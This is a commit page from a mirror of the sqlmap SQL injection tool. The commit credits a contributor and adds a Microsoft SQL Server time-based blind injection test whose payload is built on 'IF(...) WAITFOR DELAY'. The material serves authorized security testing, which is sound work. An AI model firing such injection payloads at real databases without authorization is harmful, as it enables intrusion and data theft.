mirror of
https://github.com/sqlmapproject/sqlmap.git
synced 2024-11-29 04:53:48 +03:00
added MSSQL time based vector
This commit is contained in:
parent
3822b494ea
commit
bdcb10cdab
|
@ -282,6 +282,10 @@ Adrian Pastor <ap@gnucitizen.org>
|
||||||
Chris Patten <cpatten@sunera.com>
|
Chris Patten <cpatten@sunera.com>
|
||||||
for reporting a bug in the blind SQL injection bisection algorithm
|
for reporting a bug in the blind SQL injection bisection algorithm
|
||||||
|
|
||||||
|
Steve Pinkham <steve.pinkham@gmail.com>
|
||||||
|
for suggesting a feature
|
||||||
|
for providing a new sql injection vector (MSSQL time based)
|
||||||
|
|
||||||
Adam Pridgen <adam.pridgen@gmail.com>
|
Adam Pridgen <adam.pridgen@gmail.com>
|
||||||
for suggesting some features
|
for suggesting some features
|
||||||
|
|
||||||
|
|
|
@ -1700,6 +1700,26 @@ Formats:
|
||||||
</details>
|
</details>
|
||||||
</test>
|
</test>
|
||||||
|
|
||||||
|
<test>
|
||||||
|
<title>Microsoft SQL Server/Sybase AND time-based blind</title>
|
||||||
|
<stype>5</stype>
|
||||||
|
<level>1</level>
|
||||||
|
<risk>0</risk>
|
||||||
|
<clause>0</clause>
|
||||||
|
<where>1</where>
|
||||||
|
<vector>IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'</vector>
|
||||||
|
<request>
|
||||||
|
<payload>WAITFOR DELAY '0:0:[SLEEPTIME]'</payload>
|
||||||
|
<comment>--</comment>
|
||||||
|
</request>
|
||||||
|
<response>
|
||||||
|
<time>[SLEEPTIME]</time>
|
||||||
|
</response>
|
||||||
|
<details>
|
||||||
|
<dbms>Microsoft SQL Server</dbms>
|
||||||
|
</details>
|
||||||
|
</test>
|
||||||
|
|
||||||
<test>
|
<test>
|
||||||
<title>Microsoft SQL Server/Sybase AND time-based blind (heavy query)</title>
|
<title>Microsoft SQL Server/Sybase AND time-based blind (heavy query)</title>
|
||||||
<stype>5</stype>
|
<stype>5</stype>
|
||||||
|
|
Loading…
Reference in New Issue
Block a user